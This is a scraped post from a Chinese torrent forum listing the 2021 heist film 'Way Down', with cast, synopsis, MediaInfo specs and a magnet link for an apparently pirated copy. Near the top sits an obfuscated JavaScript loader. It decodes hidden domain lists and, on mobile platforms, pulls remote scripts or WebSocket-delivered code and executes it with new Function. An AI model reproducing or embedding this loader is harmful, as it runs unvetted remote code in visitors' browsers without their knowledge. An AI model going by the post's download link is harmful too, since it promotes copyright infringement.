沿路而下[英语音轨/中文字幕].Way.Down.2021.1080p.迅雷下载 7.71GB

版主小s 1月前 222

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

image.png

◎译 名 沿路而下 / 90分钟惊涛械劫(港) / 马德里金库盗数90分钟(台) / 惊天结案 / 保险库 / The Vault

◎片 名 Way Down

◎年 代 2021

◎产 地 西班牙

◎类 别 动作 / 犯罪

◎语 言 英语

◎上映日期 2021-01-15(中国台湾) / 2021-03-26(美国) / 2021-11-12(西班牙)

◎IMDb链接 https://www.imdb.com/title/tt9742794/

◎豆瓣评分 7.0/10 (11566人评价)

◎豆瓣链接 https://movie.douban.com/subject/30456637/

◎片 长 118分钟

◎导 演 豪梅·巴拉格罗 Jaume Balagueró (id:1040748)

◎编 剧 安德烈斯·M·科佩尔 Andrés M. Koppel (id:1302864)

米歇尔·加坦比 Michel Gaztambide (id:1284651)

罗恩·阿塞尔 Rowan Athale (id:1306666)

◎演 员 弗莱迪·海默 Freddie Highmore (id:1016672)

阿斯特丽德·伯格斯-弗瑞斯贝 àstrid Bergès-Frisbey (id:1227601)

萨姆·赖利 Sam Riley (id:1013934)

利亚姆·坎宁安 Liam Cunningham (id:1018077)

何塞·科罗纳多 José Coronado (id:1074062)

路易斯·托萨尔 Luis Tosar (id:1027448)

埃米利奥·古铁雷斯·卡巴 Emilio Gutiérrez Caba (id:1099930)

阿克塞尔·施泰因 Axel Stein (id:1150800)

法米克·詹森 Famke Janssen (id:1040523)

弗兰克·费斯 Frank Feys (id:1081555)

维森特·希尔 Vicente Gil (id:1364663)

雷格·威尔森 Reg Wilson (id:1393959)

克雷格·史蒂文森 Craig Stevenson (id:1365770)

亨特·特里梅恩 Hunter Tremayne (id:1393958)

大卫·切弗斯 David Chevers (id:1385517)

贾格布·迪森塔 Jacobo Dicenta (id:1379382)

托马斯·德尔·伊思塔 Tomás del Estal (id:1381438)

胡利奥·维莱斯 Julio Vélez (id:1162908)

Simon Cohen (id:1229556)

费兰·特拉萨 Ferran Terraza (id:1364660)

哈维尔·加里多·加西亚 Javier Garrido García (id:1437771)

◎标 签 犯罪 / 西班牙 / 悬疑 / 动作 / 2021 / 电影 / 弗莱迪海默 / 欧美动作

◎简 介

西班牙银行是无与伦比的,绝对没有人能闯得进去,也不可能被人抢劫,没有蓝图、没有资料,世上没有人知道一百多年前用来建造金库的历史性工法。这个充满刺激的挑战激起了汤姆的好奇心:这个天才决心找出金库的秘密,闯进银行的最深处。

目标是遗失已久的宝藏,将在这家银行内保管仅仅十天。在极具领袖风范的艺术鉴赏家华特的带领之下,汤姆和他的团队要在短短十天内准备好这次的抢案,事成后还要拟好千载难逢的逃跑计划。计划十天,但执行这个计划却只有90分钟:这90分钟是世界杯足球决赛的时间,届时将吸引成千上万的球迷来到西班牙银行的门口。

  1. General

  2. Unique ID : 37159552059316282279433272234323216183 (0x1BF4AB5E007D5D04A48CE18C101C0737)

  3. Complete name : Way.Down.2021.1080p.BluRay.DTS-HD.MA.5.1.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 7.71 GiB

  7. Duration : 1 h 58 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 9 336 kb/s

  10. Movie name : Way Down 2021 1080p BluRay DTS-HD MA 5.1 x265-10bit-HDS

  11. Encoded date : UTC 2021-06-16 23:05:54

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 58 min

  21. Bit rate : 7 214 kb/s

  22. Width : 1 920 pixels

  23. Height : 804 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.195

  31. Stream size : 5.96 GiB (77%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS XLL

  39. Format/Info : Digital Theater Systems

  40. Commercial name : DTS-HD Master Audio

  41. Codec ID : A_DTS

  42. Duration : 1 h 58 min

  43. Bit rate mode : Variable

  44. Bit rate : 2 019 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : C L R Ls Rs LFE

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 93.750 FPS (512 SPF)

  49. Bit depth : 16 bits

  50. Compression mode : Lossless

  51. Stream size : 1.67 GiB (22%)

  52. Title : English

  53. Language : English

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 48 min

  63. Bit rate : 46.9 kb/s

  64. Count of elements : 2248

  65. Stream size : 36.3 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 48 min

  77. Bit rate : 47.6 kb/s

  78. Count of elements : 2248

  79. Stream size : 36.8 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 48 min

  91. Bit rate : 48.6 kb/s

  92. Count of elements : 2248

  93. Stream size : 37.5 MiB (0%)

  94. Title : CHS&ENG

  95. Language : Chinese

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 48 min

  105. Bit rate : 49.1 kb/s

  106. Count of elements : 2248

  107. Stream size : 38.0 MiB (0%)

  108. Title : CHT&ENG

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Text #5

  113. ID : 7

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 46 min

  119. Bit rate : 34.1 kb/s

  120. Count of elements : 2484

  121. Stream size : 26.0 MiB (0%)

  122. Title : ENG

  123. Language : English

  124. Default : No

  125. Forced : No


  126. Menu

  127. 00:00:00.000 : en:Chapter 01

  128. 00:06:25.833 : en:Chapter 02

  129. 00:10:45.708 : en:Chapter 03

  130. 00:20:11.667 : en:Chapter 04

  131. 00:32:20.750 : en:Chapter 05

  132. 00:48:36.417 : en:Chapter 06

  133. 00:58:25.000 : en:Chapter 07

  134. 01:11:59.292 : en:Chapter 08

  135. 01:23:51.583 : en:Chapter 09

  136. 01:36:43.083 : en:Chapter 10

  137. 01:43:25.417 : en:Chapter 11

  138. 01:51:20.458 : en:Chapter 12


TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:7B3D2FF82987E0C66988B276E0443A52D2BFD9C7
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖